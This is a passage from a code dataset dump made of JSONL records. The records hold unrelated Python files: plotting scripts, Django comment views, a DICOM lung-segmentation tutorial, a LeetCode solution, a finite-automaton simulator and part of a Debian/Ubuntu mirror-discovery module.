params['layers'][3]['win_len']))\n\nfor i in range(100):\n # mlab.pipeline.volume(mlab.pipeline.scalar_field(w[i]))\n mlab.pipeline.glyph(mlab.pipeline.scalar_scatter(w[i]))\n mlab.show()\n","sub_path":"output/plot3d.py","file_name":"plot3d.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519098379","text":"from django.shortcuts import render\nfrom django.views.decorators.http import require_POST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\n\nfrom .models import Comment\nfrom .forms import CommentForm, ReplyForm, EditForm\nfrom .decorators import require_ajax\n\nclass CommentsContextMixin:\n login_url = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n comments = Comment.objects.filter(object_id=self.request.session['comments_owner_id'])\n data = {\n 'comments': comments,\n 'comment_form': CommentForm(),\n 'reply_form': ReplyForm(),\n 'edit_form': EditForm(),\n 'login_url': self.login_url\n }\n context.update(data)\n return context\n\n@login_required\n@require_POST\n@require_ajax\ndef add_comment(request): \n form = CommentForm(request.POST)\n if form.is_valid():\n form.save(commit=False)\n form.instance.author = request.user\n form.instance.content_type_id = ContentType.objects.get(\n model=request.session['comments_owner_model_name']).id\n form.instance.object_id = request.session['comments_owner_id']\n form.save()\n context = {\n # returns created comment in an QuerySet (itterable object is required because template uses forloop tag).\n # First comment in QuerySet is just created one, because of ordering = ['-pub_date'].\n 'comments': Comment.objects.all()[0:1],\n 'reply_form': ReplyForm(),\n 'edit_form': EditForm()\n }\n return render(request, 'comments/comments.html', context)\n\n@login_required\n@require_POST\n@require_ajax\ndef add_reply(request):\n form = ReplyForm(request.POST)\n parent_id = request.POST.get('parentId')\n if form.is_valid():\n form.save(commit=False)\n form.instance.author = request.user\n form.instance.content_type_id = ContentType.objects.get(model='comment').id\n form.instance.object_id = form.instance.parent_id = parent_id\n form.save()\n context = {\n 'reply': Comment.objects.latest('pub_date'),\n 'edit_form': EditForm(),\n 'create_reply': True # bool just for check in template\n } \n return render(request, 'comments/replies.html', context)\n\n@login_required\n@require_POST\n@require_ajax\ndef edit_comment_or_reply(request, pk):\n target = get_object_or_404(Comment, pk=pk)\n form = EditForm(request.POST)\n if form.is_valid():\n target.text = form.cleaned_data['text']\n target.save()\n return HttpResponse(target.text)\n \n@login_required\n@require_POST\n@require_ajax\ndef delete_comment_or_reply(request, pk):\n target = get_object_or_404(Comment, pk=pk)\n target.delete()\n if target.is_reply():\n return HttpResponse('

    Reply deleted

    ')\n return HttpResponse('

    Comment deleted

    ')","sub_path":"comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224444335","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 14 23:50:22 2018\r\n\r\n@author: Chandrakant Pattekar\r\n\"\"\"\r\n\r\nimport numpy as np # linear algebra\r\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\r\nimport dicom\r\nimport os\r\nimport scipy.ndimage\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage import measure, morphology\r\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\r\n\r\n#newpath = \"C:\\\\Users\\\\echtpar\\\\Anaconda3\\\\KerasProjects\\\\Keras-CNN-Tutorial\\\\AllLuna16Data\\\\R_004\\\\06-30-1997-Diagnostic Pre-Surgery Contrast Enhanced CT-71813\\\\3- NONE -29295\"\r\n\r\n\r\ndef plot_3d(image, threshold=-300):\r\n\r\n \r\n # Position the scan upright, \r\n # so the head of the patient would be at the top facing the camera\r\n #p = first_patient_pixels.transpose(2,1,0)\r\n \r\n p = pix_resampled.transpose(2,1,0)\r\n verts, faces, norm, val = measure.marching_cubes(p, threshold)\r\n \r\n \r\n fig = plt.figure(figsize=(10, 10))\r\n ax = fig.add_subplot(111, projection='3d')\r\n \r\n # Fancy indexing: `verts[faces]` to generate a collection of triangles\r\n mesh = Poly3DCollection(verts[faces], alpha=0.70)\r\n face_color = [0.45, 0.45, 0.75]\r\n mesh.set_facecolor(face_color)\r\n ax.add_collection3d(mesh)\r\n \r\n ax.set_xlim(0, p.shape[0])\r\n ax.set_ylim(0, p.shape[1])\r\n ax.set_zlim(0, p.shape[2])\r\n \r\n plt.show()\r\n\r\n\r\ndef largest_label_volume(im, bg=-1):\r\n vals, counts = np.unique(im, return_counts=True)\r\n\r\n counts = counts[vals != bg]\r\n vals = vals[vals != bg]\r\n\r\n if len(counts) > 0:\r\n return vals[np.argmax(counts)]\r\n else:\r\n return None\r\n\r\n\r\n\r\n# Some constants \r\nINPUT_FOLDER = os.getcwd()\r\nprint(INPUT_FOLDER)\r\npath = os.path.join(INPUT_FOLDER, \"AllLuna16Data\\\\R_004\\\\06-30-1997-Diagnostic Pre-Surgery Contrast Enhanced CT-71813\\\\3- NONE -29295\")\r\npatients = os.listdir(path)\r\nprint(patients)\r\npatients.sort()\r\n\r\n\r\n#path = path + patients[0]\r\n#print(path)\r\n\r\nslices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)]\r\ny = [x.ImagePositionPatient for x in slices]\r\nprint(y)\r\n\r\nprint(len(slices))\r\n\r\nprint(\"look at attributes of slices\")\r\nprint(\"============================\")\r\nq = [x for x in dir(slices)]\r\nprint(dir(slices))\r\n\r\nprint(\"\\n look at attributes of individual slice\")\r\nprint(\"============================\")\r\nprint([y for y in dir(slices[0])])\r\n\r\nprint('AcquisitionNumber',slices[0].AcquisitionNumber)\r\nprint('BitsAllocated',slices[0].BitsAllocated)\r\nprint('BitsStored',slices[0].BitsStored)\r\nprint('Columns',slices[0].Columns)\r\nprint('FrameOfReferenceUID', slices[0].FrameOfReferenceUID)\r\nprint('HighBit',slices[0].HighBit)\r\nprint('ImageOrientationPatient',slices[0].ImageOrientationPatient)\r\nprint('ImagePositionPatient',slices[0].ImagePositionPatient)\r\nprint('InstanceNumber',slices[0].InstanceNumber)\r\nprint('KVP',slices[0].KVP)\r\nprint('Modality',slices[0].Modality)\r\nprint('PatientBirthDate',slices[0].PatientBirthDate)\r\nprint('PatientID',slices[0].PatientID)\r\nprint('PatientName',slices[0].PatientName)\r\nprint('PatientOrientation',slices[0].PatientOrientation)\r\nprint('PhotometricInterpretation',slices[0].PhotometricInterpretation)\r\nprint('PixelData length',len(slices[0].PixelData))\r\nprint('PixelPaddingValue',slices[0].PixelPaddingValue)\r\nprint('PixelRepresentation',slices[0].PixelRepresentation)\r\nprint('PixelSpacing',slices[0].PixelSpacing)\r\nprint('PositionReferenceIndicator',slices[0].PositionReferenceIndicator)\r\nprint('RescaleIntercept',slices[0].RescaleIntercept)\r\nprint('RescaleSlope',slices[0].RescaleSlope)\r\nprint('Rows',slices[0].Rows)\r\nprint('SOPClassUID',slices[0].SOPClassUID)\r\nprint('SOPInstanceUID',slices[0].SOPInstanceUID)\r\nprint('SamplesPerPixel',slices[0].SamplesPerPixel)\r\nprint('SeriesDescription',slices[0].SeriesDescription)\r\nprint('SeriesInstanceUID',slices[0].SeriesInstanceUID)\r\nprint('SeriesNumber',slices[0].SeriesNumber)\r\nprint('SliceLocation',slices[0].SliceLocation)\r\nprint('SpecificCharacterSet',slices[0].SpecificCharacterSet)\r\nprint('StudyInstanceUID',slices[0].StudyInstanceUID)\r\nprint('WindowCenter',slices[0].WindowCenter)\r\nprint('WindowWidth',slices[0].WindowWidth)\r\n\r\n\r\n\r\nslices.sort(key = lambda x: float(x.ImagePositionPatient[2]))\r\ntry:\r\n slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])\r\nexcept:\r\n slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)\r\n \r\nfor s in slices:\r\n s.SliceThickness = slice_thickness\r\n \r\nfirst_patient = slices\r\n\r\nprint(slices[0])\r\n\r\nprint(slices[0].pixel_array.shape)\r\n\r\nimage = np.stack([s.pixel_array for s in slices])\r\n # Convert to int16 (from sometimes int16), \r\n # should be possible as values should always be low enough (<32k)\r\nimage = image.astype(np.int16)\r\n\r\n # Set outside-of-scan pixels to 0\r\n # The intercept is usually -1024, so air is approximately 0\r\nimage[image == -2000] = 0\r\n \r\n # Convert to Hounsfield units (HU)\r\nfor slice_number in range(len(slices)):\r\n \r\n intercept = slices[slice_number].RescaleIntercept\r\n slope = slices[slice_number].RescaleSlope\r\n \r\n if slope != 1:\r\n image[slice_number] = slope * image[slice_number].astype(np.float64)\r\n image[slice_number] = image[slice_number].astype(np.int16)\r\n \r\n image[slice_number] += np.int16(intercept)\r\n \r\nfirst_patient_pixels = np.array(image, dtype=np.int16)\r\n\r\n\r\nf, ax = plt.subplots(10,5, figsize=(25,25))\r\n\r\naxes = ax.flat\r\n\r\nfor i, x in enumerate(axes):\r\n x.imshow(first_patient_pixels[i-1], cmap=plt.cm.gray)\r\n x.axis(\"off\")\r\n\r\nplt.show()\r\n\r\n\r\nfig = plt.figure()\r\nplt.hist(first_patient_pixels.flatten(), bins=80, color='c')\r\nplt.xlabel(\"Hounsfield Units (HU)\")\r\nplt.ylabel(\"Frequency\")\r\nplt.show()\r\n\r\n# Show some slice in the middle\r\nfig = plt.figure()\r\nplt.imshow(first_patient_pixels[67], cmap=plt.cm.gray)\r\nplt.show()\r\n\r\n\r\n\r\nprint(first_patient[0].SliceThickness)\r\n\r\nprint(first_patient[0].PixelSpacing)\r\n\r\nprint(first_patient_pixels.shape)\r\n\r\n\r\n\r\nprint(len(first_patient))\r\nprint(first_patient[0].pixel_array.shape)\r\nprint(type(first_patient))\r\n\r\nprint(len(first_patient_pixels))\r\nprint(first_patient_pixels.shape)\r\nprint(type(first_patient_pixels))\r\n\r\n\r\n\r\nimage = first_patient_pixels\r\nscan = first_patient\r\nnew_spacing=[1,1,1]\r\n\r\n\r\nspacing = np.hstack([[first_patient[0].SliceThickness], first_patient[0].PixelSpacing])\r\nspacing = np.array(spacing, dtype=np.float32)\r\nprint(spacing)\r\nprint(type(spacing))\r\n\r\nresize_factor = spacing / new_spacing\r\nprint(resize_factor, spacing, new_spacing)\r\n\r\n\r\nnew_real_shape = image.shape * resize_factor\r\nprint(new_real_shape)\r\n\r\n\r\nnew_shape = np.round(new_real_shape)\r\nprint(new_shape)\r\n\r\nreal_resize_factor = new_shape / image.shape\r\nprint(real_resize_factor)\r\n\r\n\r\nnew_spacing = spacing / real_resize_factor\r\nprint(new_spacing)\r\n\r\n\r\nimage = scipy.ndimage.interpolation.zoom(image, real_resize_factor, mode='nearest')\r\npix_resampled, spacing = image, new_spacing\r\n\r\n\r\nprint(pix_resampled.shape)\r\nprint(spacing)\r\n\r\n\r\nprint(\"Shape before resampling\\t\", first_patient_pixels.shape)\r\nprint(\"Shape after resampling\\t\", pix_resampled.shape)\r\n\r\nplot_3d(pix_resampled, 400) \r\n\r\n\r\nimage = pix_resampled\r\nprint(np.unique(image))\r\nfill_lung_structures=True\r\n# not actually binary, but 1 and 2. \r\n# 0 is treated as background, which we do not want\r\nbinary_image = np.array(image > -320, dtype=np.int8)+1\r\nprint(binary_image.shape)\r\nprint(image.shape)\r\n\r\n\r\nprint(np.unique(binary_image))\r\nprint(np.unique(image))\r\n\r\n\r\nlabels = measure.label(binary_image)\r\nprint(len([x.shape for x in labels]))\r\n\r\nprint(len(np.unique(labels)))\r\n#print(labels[1,1,1])\r\nprint(binary_image[labels == 100])\r\n \r\n# Pick the pixel in the very corner to determine which label is air.\r\n# Improvement: Pick multiple background labels from around the patient\r\n# More resistant to \"trays\" on which the patient lays cutting the air \r\n# around the person in half\r\nbackground_label = labels[0,0,0]\r\nprint(background_label)\r\n\r\n \r\n#Fill the air around the person\r\nbinary_image[background_label == labels] = 2\r\nz = measure.label(binary_image)\r\nprint(len(np.unique(z)))\r\nprint(binary_image[z == 100])\r\n \r\n\r\nfor i, x in enumerate(binary_image):\r\n print(i,x.shape)\r\n print(np.unique(measure.label(x-1), return_counts=True))\r\n #print(measure.label(x-1)[0].shape)\r\n #print(measure.label(x-1)[1].shape)\r\n \r\n \r\n \r\n# Method of filling the lung structures (that is superior to something like \r\n# morphological closing)\r\nif fill_lung_structures:\r\n # For every slice we determine the largest solid structure\r\n for i, axial_slice in enumerate(binary_image):\r\n axial_slice = axial_slice - 1\r\n labeling = measure.label(axial_slice)\r\n\r\n #####\r\n im = labeling\r\n bg = 0\r\n vals, counts = np.unique(im, return_counts=True)\r\n print(vals,counts)\r\n counts = counts[vals != bg]\r\n vals = vals[vals != bg]\r\n\r\n if len(counts) > 0:\r\n l_max = vals[np.argmax(counts)]\r\n else:\r\n l_max = None \r\n \r\n #####\r\n \r\n if l_max is not None: #This slice contains some lung\r\n binary_image[i][labeling != l_max] = 1\r\n\r\n \r\nbinary_image -= 1 #Make the image actual binary\r\nbinary_image = 1-binary_image # Invert it, lungs are now 1\r\n \r\n# Remove other air pockets insided body\r\nlabels = measure.label(binary_image, background=0)\r\nl_max = largest_label_volume(labels, bg=0)\r\nif l_max is not None: # There are air pockets\r\n binary_image[labels != l_max] = 0\r\n \r\nsegmented_lungs = binary_image\r\n\r\n\r\nplot_3d(segmented_lungs, 0)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef load_scan(path):\r\n slices = [dicom.read_file(path + '/' + s) for s in os.listdir(path)]\r\n slices.sort(key = lambda x: float(x.ImagePositionPatient[2]))\r\n try:\r\n slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])\r\n except:\r\n slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)\r\n \r\n for s in slices:\r\n s.SliceThickness = slice_thickness\r\n \r\n return slices\r\n\r\n\r\n\r\ndef get_pixels_hu(slices):\r\n image = np.stack([s.pixel_array for s in slices])\r\n # Convert to int16 (from sometimes int16), \r\n # should be possible as values should always be low enough (<32k)\r\n image = image.astype(np.int16)\r\n\r\n # Set outside-of-scan pixels to 0\r\n # The intercept is usually -1024, so air is approximately 0\r\n image[image == -2000] = 0\r\n \r\n # Convert to Hounsfield units (HU)\r\n for slice_number in range(len(slices)):\r\n \r\n intercept = slices[slice_number].RescaleIntercept\r\n slope = slices[slice_number].RescaleSlope\r\n \r\n if slope != 1:\r\n image[slice_number] = slope * image[slice_number].astype(np.float64)\r\n image[slice_number] = image[slice_number].astype(np.int16)\r\n \r\n image[slice_number] += np.int16(intercept)\r\n \r\n return np.array(image, dtype=np.int16)\r\n\r\n\r\n\r\n\r\n\r\ndef resample(image, scan, new_spacing=[1,1,1]):\r\n # Determine current pixel spacing\r\n #spacing = np.array(np.array(scan[0].SliceThickness) + np.array(scan[0].PixelSpacing[0]), dtype=np.float32)\r\n\r\n spacing = np.hstack([[scan[0].SliceThickness], scan[0].PixelSpacing])\r\n resize_factor = spacing / new_spacing\r\n new_real_shape = image.shape * resize_factor\r\n new_shape = np.round(new_real_shape)\r\n real_resize_factor = new_shape / image.shape\r\n new_spacing = spacing / real_resize_factor\r\n \r\n image = scipy.ndimage.interpolation.zoom(image, real_resize_factor, mode='nearest')\r\n \r\n return image, new_spacing\r\n\r\n\r\n\r\npix_resampled, spacing = resample(first_patient_pixels, first_patient, [1,1,1])\r\nprint(\"Shape before resampling\\t\", first_patient_pixels.shape)\r\nprint(\"Shape after resampling\\t\", pix_resampled.shape)\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\ndef segment_lung_mask(image, fill_lung_structures=True):\r\n \r\n # not actually binary, but 1 and 2. \r\n # 0 is treated as background, which we do not want\r\n binary_image = np.array(image > -320, dtype=np.int8)+1\r\n labels = measure.label(binary_image)\r\n \r\n # Pick the pixel in the very corner to determine which label is air.\r\n # Improvement: Pick multiple background labels from around the patient\r\n # More resistant to \"trays\" on which the patient lays cutting the air \r\n # around the person in half\r\n background_label = labels[0,0,0]\r\n \r\n #Fill the air around the person\r\n binary_image[background_label == labels] = 2\r\n \r\n \r\n # Method of filling the lung structures (that is superior to something like \r\n # morphological closing)\r\n if fill_lung_structures:\r\n # For every slice we determine the largest solid structure\r\n for i, axial_slice in enumerate(binary_image):\r\n axial_slice = axial_slice - 1\r\n labeling = measure.label(axial_slice)\r\n l_max = largest_label_volume(labeling, bg=0)\r\n \r\n if l_max is not None: #This slice contains some lung\r\n binary_image[i][labeling != l_max] = 1\r\n\r\n \r\n binary_image -= 1 #Make the image actual binary\r\n binary_image = 1-binary_image # Invert it, lungs are now 1\r\n \r\n # Remove other air pockets insided body\r\n labels = measure.label(binary_image, background=0)\r\n l_max = largest_label_volume(labels, bg=0)\r\n if l_max is not None: # There are air pockets\r\n binary_image[labels != l_max] = 0\r\n \r\n return binary_image\r\n\r\nsegmented_lungs = segment_lung_mask(pix_resampled, False)\r\nsegmented_lungs_fill = segment_lung_mask(pix_resampled, True)\r\n\r\n\r\nplot_3d(segmented_lungs_fill, 0)\r\nplot_3d(segmented_lungs_fill - segmented_lungs, 0)\r\n\r\n\r\n\r\n\r\n","sub_path":"LearnKaggleLungDetectionDicom.py","file_name":"LearnKaggleLungDetectionDicom.py","file_ext":"py","file_size_in_byte":13746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154040612","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.style\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\nplt.style.use(\"seaborn-muted\")\r\n\r\ndf = pd.read_csv(\"Optimize.csv\").iloc[:, :-1]\r\ndata = df.values\r\n\r\ndf = df.sort_values(by=['Percent of 10D Avg'])\r\ngrouped = df.groupby([\"NR Days\"])\r\n\r\nx, y, z = [], [], []\r\n\r\nfor name, group in grouped:\r\n x.append(group.iloc[:, 2].tolist())\r\n y.append(group.iloc[:, 1].tolist())\r\n z.append(group.iloc[:, 0].tolist())\r\n\r\nx, y, z = np.array(x), np.array(y), np.array(z)\r\n\r\ncolumns = df.columns.tolist()\r\ndef get_lims(l):\r\n return (np.min(l), np.max(l))\r\n\r\ncolor_map = cm.jet\r\n\r\n\r\nfig = plt.figure(figsize=(20, 10))\r\n\r\nax = fig.gca(projection='3d')\r\nax.xaxis._axinfo['label']['space_factor'] = 10\r\n\r\nsurf = ax.plot_surface(x, y, z, cmap=cm.jet, linewidth=0.2, antialiased=True, edgecolor=\"black\", shade=True)\r\n\r\n\r\nax.set_xlabel(columns[2],fontsize=20)\r\nax.set_ylabel(columns[1],fontsize=20)\r\nax.set_zlabel(columns[0],fontsize=20)\r\n\r\n\r\nax.set_xlim(get_lims(data[:, 2]))\r\nax.set_ylim(get_lims(data[:, 1]))\r\nax.set_zlim(get_lims(data[:, 0]))\r\n\r\nax.set_xticks(np.arange(np.min(data[:, 2]), np.max(data[:, 2]), 1))\r\nax.set_xticklabels(map(lambda x: \"{:.0f}\".format(x), np.arange(np.min(data[:, 2]), np.max(data[:, 2]), 1)), fontsize=10)\r\n\r\nax.set_yticks(np.arange(0.1, 1.05, 0.05))\r\nax.set_yticklabels(map(lambda x: \"{:.2f}\".format(x), np.arange(0.1, 1.05, 0.05)), fontsize=8)\r\n\r\nax.set_zticks(np.arange(0, np.max(data[:, 0]), 0.2))\r\nax.set_zticklabels(map(lambda x: \"{:.1f}\".format(x), np.arange(0, np.max(data[:, 0]), 0.2)), fontsize=10)\r\n\r\nax.view_init(50, -20)\r\n\r\nax.xaxis.labelpad=30\r\nax.yaxis.labelpad=30\r\n\r\nfig.colorbar(surf, ax=ax, shrink=0.5, aspect=5)\r\n\r\n\r\n\r\nplt.show()\r\n","sub_path":"3dchart.py","file_name":"3dchart.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452286987","text":"\"\"\"441. Arranging Coins\n\nYou have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.\n\nGiven n, find the total number of full staircase rows that can be formed.\n\nn is a non-negative integer and fits within the range of a 32-bit signed integer.\n\nExample 1:\n\nn = 5\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤\n\nBecause the 3rd row is incomplete, we return 2.\n\"\"\"\nclass Solution:\n def arrangeCoins(self, n: int) -> int:\n \"\"\"\n binary search res where\n (1+res)*res/2 <= n, 1<= res <= n\n \"\"\"\n if n < 1:\n return 0\n left, right = 1, n\n while left <= right:\n tmp = (left+right)//2\n cur = tmp * (tmp + 1)\n if cur == 2*n:\n return tmp\n elif cur > 2*n:\n right = tmp - 1\n else:\n left = tmp + 1\n return right\n\"\"\"\nalso see 35\n\"\"\"","sub_path":"leetcode_pop_q/441_Easy_Arranging_Coins.py","file_name":"441_Easy_Arranging_Coins.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302380392","text":"def remove_repetidos(lista): # Funcao que remove elementos repetidos do conjunto\n l = [] # gerados apos o processo de uniao\n for i in lista:\n if i not in l:\n l.append(i)\n return l\n \ndef e_fecho(estados):\n global regras\n\n efecho = []\n temp = estados\n\n for est in temp:\n efecho.append(est)\n for regra in regras:\n if regra[0] == est:\n if regra[1] == 'E':\n efecho = efecho + regra[2]\n for r in regra[2]: # for garante que nao vai ser comparado lista com string\n if r not in temp:\n temp.append(r)\n\n efecho = remove_repetidos(efecho)\n \n return efecho\n\ndef gera_ram(estado,entrada): \n global index\n global estAtual_2\n global flag\n global estFin\n global handler\n\n \n handler.write(\"Chegou em: \"+ estado+ \"\\n\")\n handler.write(\"e_fecho de:\"+ estado+ \" =\"+ str(e_fecho([estado]))+\"\\n\")\n\n estAtual_2 = estado\n for i in range(len(estFin)):\n if estFin[i] in e_fecho([estado]) and index == len(entrada):\n flag = 1\n handler.write(\"E - Estado alterado de \" + str(estado) + \" para \" + estFin[i]+ \"\\n\")\n return\n\n if index != len(entrada):\n \n for regra in regras:\n \n if entrada[index] == regra[1]:\n if estado == regra[0]:\n handler.write(str(entrada[index]) + \" - Estado alterado de \" + str(estado) + \" para \" + str(regra[2])+\"\\n\")\n\n estAtual = regra[2]\n \n for k in range(len(estAtual)):\n estAtual_2 = estAtual[k]\n index = index + 1\n gera_ram(estAtual_2,entrada)\n index = index - 1\n handler.write(\"\\nBacktrack\\n\")\n if regra[1] == 'E':\n if estado == regra[0]:\n handler.write(\"E - Estado alterado de \" + str(estado) + \" para \" + str(regra[2]))\n\n estAtual = regra[2]\n\n for k in range(len(estAtual)):\n estAtual_2 = estAtual[k]\n gera_ram(estAtual_2,entrada)\n handler.write(\"\\nBacktrack\\n\")\n\n elif estAtual_2 in estFin:\n flag = 1\n return\n \n\n\ndef afne(entrada):\n global handler\n global estFin\n global index\n global flag\n global regras\n\n handler = open(\"automato_ndetE.txt\",\"r\")\n \n linhas = handler.readlines()\n handler.close()\n\n alfabeto = []\n for elemento in linhas[0]:\n if elemento != '\\n':\n alfabeto.append(elemento)\n\n\n estados = linhas[1].split() # Leitura de dados\n\n estIni = linhas[2].split()\n\n estFin = linhas[3].split()\n\n qnt_regras = len(linhas) - 4\n\n regras = []\n for i in range(4,len(linhas)): # Do que foi lido no arquivo, aqui se pega as regras\n regras.append(linhas[i].split())\n\n for i in range(0,qnt_regras):\n aux = regras[i]\n aux2 = aux[2].split(\",\")\n del(aux[2])\n aux.append(aux2)\n regras[i] = aux\n\n\n handler = open(\"resultado.txt\",\"w\")\n \n handler.write(\"Alfabeto: \" + str(alfabeto) + \"\\n\" + \"Estados: \" +\n str(estados) + \"\\n\" + \"Estado Inicial: \" + str(estIni) + \"\\n\" + \n \"Estado(s) Final(is): \" + str(estFin) + \"\\n\" + \"\\nRegras: \" + \"\\n\")\n\n\n for i in range(0,qnt_regras):\n aux = regras[i]\n handler.write(str(i+1) + \") \" + \"(\" + str(aux[0]) + \",\" + str(aux[1]) + \") = \" + str(aux[2]) + \"\\n\")\n\n handler.write(\"\\n\")\n\n\n for i in range(0,len(entrada)): # Percorre os elementos do caso teste atual\n elemAtual = entrada[i]\n if elemAtual not in alfabeto:\n # Verifica se todos os elementos do caso atual \n # pertencem ao alfabeto\n \n handler.write(\"O caso teste possui elemento(s) que nao esta(o) no alfabeto!\")\n handler.close()\n exit()\n\n handler.write(entrada + \"\\n\")\n\n handler.write('\\n')\n \n index = 0\n flag = 0\n \n gera_ram(estIni[0],entrada)\n\n if flag == 0:\n handler.write(entrada+ \" -> Rejeitado pelo automato!\")\n elif flag == 1:\n handler.write(entrada+ \" -> Aceito pelo automato!\")\n\n\n handler.close()\n","sub_path":"LFA/Trabalho 1 e 2 Definitivo/AFNE.py","file_name":"AFNE.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616178874","text":"# Automated, robust apt-get mirror selection for Debian and Ubuntu.\n#\n# Author: Peter Odding \n# Last Change: June 10, 2017\n# URL: https://apt-mirror-updater.readthedocs.io\n\n\"\"\"Discovery of Ubuntu package archive mirrors.\"\"\"\n\n# Standard library modules.\nimport logging\n\n# External dependencies.\nfrom bs4 import BeautifulSoup\nfrom humanfriendly import Timer, format, pluralize\n\n# Modules included in our package.\nfrom apt_mirror_updater import CandidateMirror\nfrom apt_mirror_updater.http import fetch_url\n\nUBUNTU_MIRRORS_URL = 'https://launchpad.net/ubuntu/+archivemirrors'\n\"\"\"The URL of the HTML page listing official Ubuntu mirrors (a string).\"\"\"\n\nUBUNTU_SECURITY_URL = 'http://security.ubuntu.com/ubuntu'\n\"\"\"The URL where Ubuntu security updates are hosted (a string).\"\"\"\n\nUBUNTU_MIRROR_STATUSES = (\n ('Up to date', 0),\n ('One hour behind', 60 * 60),\n ('Two hours behind', 60 * 60 * 2),\n ('Four hours behind', 60 * 60 * 4),\n ('Six hours behind', 60 * 60 * 6),\n ('One day behind', 60 * 60 * 24),\n ('Two days behind', 60 * 60 * 24 * 2),\n ('One week behind', 60 * 60 * 24 * 7),\n ('Unknown', None),\n)\nr\"\"\"\nA tuple of tuples with Launchpad mirror statuses. Each tuple consists of two values:\n\n1. The human readable mirror latency (a string) as used on :data:`UBUNTU_MIRRORS_URL`.\n2. The mirror latency expressed in seconds (a number).\n\nThe 'known statuses' used by Launchpad were checked as follows:\n\n.. code-block:: sh\n\n $ curl -s https://launchpad.net/+icing/rev18391/combo.css | tr '{},.' '\\n' | grep distromirrorstatus\n distromirrorstatusUP\n distromirrorstatusONEHOURBEHIND\n distromirrorstatusTWOHOURSBEHIND\n distromirrorstatusFOURHOURSBEHIND\n distromirrorstatusSIXHOURSBEHIND\n distromirrorstatusONEDAYBEHIND\n distromirrorstatusTWODAYSBEHIND\n distromirrorstatusONEWEEKBEHIND\n distromirrorstatusUNKNOWN\n\"\"\"\n\nVALID_UBUNTU_COMPONENTS = 'main', 'restricted', 'universe', 'multiverse'\n\"\"\"A tuple of strings with the names of the components available in the Ubuntu package repositories.\"\"\"\n\nVALID_UBUNTU_SUITES = 'release', 'security', 'updates', 'backports', 'proposed'\n\"\"\"\nA tuple of strings with the names of the suites available in the Ubuntu package\nrepositories.\n\nThe actual name of the 'release' suite is the codename of the relevant Ubuntu\nrelease, while the names of the other suites are formed by concatenating the\ncodename with the suite name (separated by a dash).\n\nAs an example to make things more concrete, Ubuntu 16.04 has the following five\nsuites available: ``xenial`` (this is the release suite), ``xenial-security``,\n``xenial-updates``, ``xenial-backports`` and ``xenial-proposed``.\n\"\"\"\n\nDEFAULT_UBUNTU_SUITES = 'release', 'updates', 'backports', 'security'\n\"\"\"A tuple of strings with the Ubuntu suites that are enabled by default.\"\"\"\n\n# Initialize a logger for this program.\nlogger = logging.getLogger(__name__)\n\n\ndef discover_mirrors():\n \"\"\"\n Discover available Ubuntu mirrors by querying :data:`UBUNTU_MIRRORS_URL`.\n\n :returns: A set of :class:`.CandidateMirror` objects that have their\n :attr:`~.CandidateMirror.mirror_url` property set and may have\n the :attr:`~.CandidateMirror.last_updated` property set.\n :raises: If no mirrors are discovered an exception is raised.\n\n An example run:\n\n >>> from apt_mirror_updater.backends.ubuntu import discover_mirrors\n >>> from pprint import pprint\n >>> pprint(discover_mirrors())\n set([CandidateMirror(mirror_url='http://archive.ubuntu.com/ubuntu/'),\n CandidateMirror(mirror_url='http://ftp.nluug.nl/os/Linux/distr/ubuntu/'),\n CandidateMirror(mirror_url='http://ftp.snt.utwente.nl/pub/os/linux/ubuntu/'),\n CandidateMirror(mirror_url='http://ftp.tudelft.nl/archive.ubuntu.com/'),\n CandidateMirror(mirror_url='http://mirror.1000mbps.com/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.amsiohosting.net/archive.ubuntu.com/'),\n CandidateMirror(mirror_url='http://mirror.i3d.net/pub/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.nforce.com/pub/linux/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.nl.leaseweb.net/ubuntu/'),\n CandidateMirror(mirror_url='http://mirror.transip.net/ubuntu/ubuntu/'),\n ...])\n \"\"\"\n timer = Timer()\n mirrors = set()\n logger.info(\"Discovering available Ubuntu mirrors (using %s) ..\", UBUNTU_MIRRORS_URL)\n response = fetch_url(UBUNTU_MIRRORS_URL, retry=True)\n soup = BeautifulSoup(response, 'html.parser')\n for table in soup.findAll('table'):\n for tr in table.findAll('tr'):\n for a in tr.findAll('a', href=True):\n # Check if the link looks like a mirror URL.\n if (a['href'].startswith(('http://', 